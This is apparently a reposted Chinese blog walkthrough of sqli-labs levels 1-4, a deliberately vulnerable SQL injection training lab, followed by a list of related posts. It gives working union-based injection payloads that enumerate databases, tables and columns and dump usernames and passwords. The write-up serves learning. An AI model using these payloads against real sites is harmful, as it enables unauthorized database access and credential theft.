2. 程式人生 > >sqli-labs 1-4通關筆記

sqli-labs 1-4通關筆記

阿新 發佈:2018-12-17

background

Mysql 有一個系統資料庫information_schema,儲存著所有的資料庫的相關資訊,一般的, 我們利用該表可以進行一次完整的注入。以下為一般的流程。

例項
select table_name from information_schema.tables where table_schema = "s
ecurity";
//查出security資料庫的所有資料表
查詢所有資料庫
select group_concat(schema_name)  from information_schema.schemata
查詢某庫的資料表
select group_concat(
 
table_name) from information_schema.tables where table_schema=’xxxxx’
查詢某表的所有列
select group_concat(column_name)  from information_schema.columns where table_name=’xxxxx’
獲取列的內容
select group_concat(id,username,password) from table.name
常用函式
  • version()——MySQL 版本
  • user()——資料庫使用者名稱
  • database()——資料庫名
  • @@datadir——資料庫路徑
  • @@version_compile_os——作業系統版本

less-1

0x01 猜解後臺sql語句,構造poc

加單引號 '報錯

near ''1'' LIMIT 0,1' at line 1

分析後臺sql語句

'1'' 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

構造poc

id=1' or 1=1 --+
0x02 列欄位

分析user表可知,存在idusernamepassword三個欄位

background

order by n

當n小於正確欄位時,回顯true; 當n大於正確欄位時,回顯false

這裡採用order by 3

0x03 聯合注入
id=-1' union select 1,2,3
//1,2,3為order by 列出的欄位個數

background

id的資料在資料庫中不存在時,前臺頁面返回我們構造的union的資料

0x04 查詢資料庫
id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
0x05 查詢指定資料庫中的資料表
id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = "security"--+
0x06 查詢指定資料表中的欄位
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = "users"--+
0x07 查詢指定欄位中的資料
id=-1' union select 1,group_concat(id,username,password),3 from users--+

less-2

猜解後臺sql語句,構造poc

加單引號'報錯資訊

near '' LIMIT 0,1' at line 1

原始碼

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

構造poc

id=1 and 1=1 --+

less-3

猜解後臺sql語句,構造poc

加單引號'報錯資訊

near ''1 '') LIMIT 0,1' at line 1

原始碼

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

構造poc

id=1 ') --+

less-4

猜解後臺sql語句,構造poc

加號'")"報錯資訊

near '") LIMIT 0,1' at line 1

原始碼

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

構造poc

id=1'") --+

相關推薦

sqli-labs 1-4通關筆記

background Mysql 有一個系統資料庫information_schema,儲存著所有的資料庫的相關資訊,一般的, 我們利用該表可以進行一次完整的注入。以下為一般的流程。 例項 select table_name from information_s

sqli-labs 1-20實驗記錄

1. less1 首先輸入?id=1 查詢是否有注入點.   輸入單引號 回顯報錯 說明有注入漏洞 而且是數字型   輸入 1’ or 1=1 order by 1 猜測列名# 這裡發現#不能變成url編碼 查一下 應該是%23 http://localh

《從0到1》讀書筆記4章“競爭意識”第1記:霧失樓臺,月迷津渡

spl 讓我 tails ext ont down 激情 都是 lines 一直以來我們接受的教育都是教導我們要做個出類拔萃的好學生,小學如此,中學這般,大學也是如是。而評論是否是個好學生的標準在我國有“三好學生”做衡量。而隨著社會就業競爭形勢的日益

Sqli labs系列-less-1 詳細篇

失敗 環境 活躍 link 攻擊 master dbd href and 要說 SQL 註入學習,網上眾多的靶場,就屬 Sqli labs 這個系列挺不錯的,關卡達到60多關了,我自己也就打了不幾關,一個挺不錯的練習SQL註入的源碼。 我一開始就準備等我一些原理篇總結完了,

第一章 概論 計算機網絡筆記 學堂在線 1.4 網絡體系結構和協議

計算機 適合 下層 幀格式 會話 運行 規範 應用 tcp 1 分層對每一層進行定義:   下一層為本層提供的服務   本層為上一層提供的服務   本層需要完成的功能 對相鄰層之間接口進行定義:   n層通過接口發出服務請求,n-1 層通過接口提供服務響應。   只要n層與

sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型 挑戰 聯合查詢 只允許10次查詢 變化1)

nbsp log 聯合 sql tables 圖片 post group spa 嘗試的次數只有10次 http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1‘ 單引號報錯,錯誤信息沒有顯示 加

sqli-labs】 less58 GET -Challenge -Double Query -5 queries allowed -Variation1 (GET型 挑戰 雙查詢 只允許5次查詢 變化1)

png sel labs 取數 技術分享 group less info union 單引號閉合成功,但是union select結果不對 http://192.168.136.128/sqli-labs-master/Less-58/?id=0‘ union sele

sqli-labs】 less65 GET -Challenge -Blind -130 queries allowed -Variation4 (GET型 挑戰 盲註 只允許130次查詢 變化4)

com ast 挑戰 get log ati image style span 雙引號括號閉合 http://192.168.136.128/sqli-labs-master/Less-65/?id=1")%23 【sqli-labs】 less65 GET -C

【Dojo 1.10】筆記4 文字動畫效果

req pla cdn .org script 如果 fun htm ready 這個筆記,僅僅演示dojo/fx模塊的slideTo()方法的簡單使用。 有關該模塊的用法,見API;有關Dojo的動畫、效果,見頁面 效果 和 動畫 1. 頁面組織 html部分同筆記3

[DeeplearningAI筆記]卷積神經網絡4.1-4.5 人臉識別/one-shot learning/Siamase網絡/Triplet損失/將面部識別轉化為二分類問題

卷積 三元 兩個 輸出 cti 輸入 數學 bubuko 人的 4.4特殊應用:人臉識別和神經網絡風格轉換 覺得有用的話,歡迎一起討論相互學習~Follow Me 4.1什麽是人臉識別 Face verification人臉驗證 VS face recognition人臉識

sqli-lab教程——1-35通關Writeup

剛做sqli-lab的時候,我逛了幾個部落格論壇沒找到什麼特別完整的教程,在這裡寫一篇更完整的教程。有關sql注入的基礎知識請檢視我的另外一篇部落格,sql注入基礎知識(還沒寫出來)   本教程中使用到的函式if() left() extractvalue() group_conc

易學筆記-計算機底層-第1章:計算機系統漫遊/1.4 處理器處理記憶體中的指令/1.4.2 執行hello程式

執行hello程式 流程圖 解釋: 從鍵盤接受使用者輸入的hello 把該輸入通過IO橋送到匯流排介面,由匯流排介面送到暫存器 暫存器再通過I/O橋把hello送到主存 敲

易學筆記-計算機底層-第1章:計算機系統漫遊/1.4 處理器處理記憶體中的指令/1.4.1 系統的硬體組成

系統的硬體組成 示意圖: 匯流排: 第6章 系統配置與效能評價/6.3 輸入輸出系統/6.3.2 匯流排 概念:電晶體,負責在各個部件間傳遞資訊 被設計成傳遞定長的位元組快,比如4個位元組或者8個位元組,也就是32位或者64位 I

python筆記1.4-1.5)

1.4 函式的變數區域性變數和全域性變數 Python中的任何變數都有特定的作用域 在函式中定義的變數一般只能在該函式內部使用,這些只能在程式的特定部分使用的變數我們稱之為區域性變數 在一個檔案頂部定義的變數可以供檔案中的任何函式呼叫,這些可以為整個程式所使用的變數稱為全域性變數 glo

DeepLearning.ai筆記:(1-4)-- 深層神經網路(Deep neural networks)

這一週主要講了深層的神經網路搭建。 深層神經網路的符號表示 在深層的神經網路中, LL表示神經網路的層數 L=4L=4 n[l]n[l]表示第ll層的神經網路個數 W[l]:(n[l],nl−1)W[l]:(n[l],nl−1) dW[l

python3學習筆記1-4

#引數定義順序:必選,預設,可變,關鍵字引數 def func(a, b, c=0, *args, **kw): print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw) args = (1,2,3,4) kw = {'x'

4.1-4.13 預習筆記

1. # df 1)用# man df, 可以看到這個命令的定義df - report file system disk space usage, 彙報檔案系統磁碟使用情況 掛載點實際為系統中的目錄,linux中的磁碟不可直接訪問必須要有個掛載點,通過掛載點才可以進入

易學筆記-Graylog日誌工具/1 安裝過程/1.4 線上安裝Elasticsearch

易學筆記 十年IT經驗個人學習筆記分享: 開發語言:C/C++/JAVA/PYTHON/GO/JSP WEB架構:Servlets/springMVC/springBoot/springClound 容器架構:Docker容器/Docker叢集/Docker與微服務整合/

計算機網路(第五版)Andrew S.Tanenbaum——學習筆記Key-point-1.4

第1章 引言 ————————本文為作者原創,轉載請註明出處———————— 此係列為本人的學習筆記,歡迎大家在留言區對概念進行拓展延伸,甚至糾錯討論! 1.4參考模型 1.4.1 OSI參考模型 1.

躺雨沒的學習筆記(3)——藍芽概述 (1.3&1.4&1.5)AMP概述&術語命名&總結

Agenda: 1.3 AMP操作概述 Alternate MAC/PHYs (AMP)是藍芽核心系統的次要控制器(secondary Controllers)。BR/EDR的主要控制器用作搜尋,配對,連線建立,連線維持。當兩個BR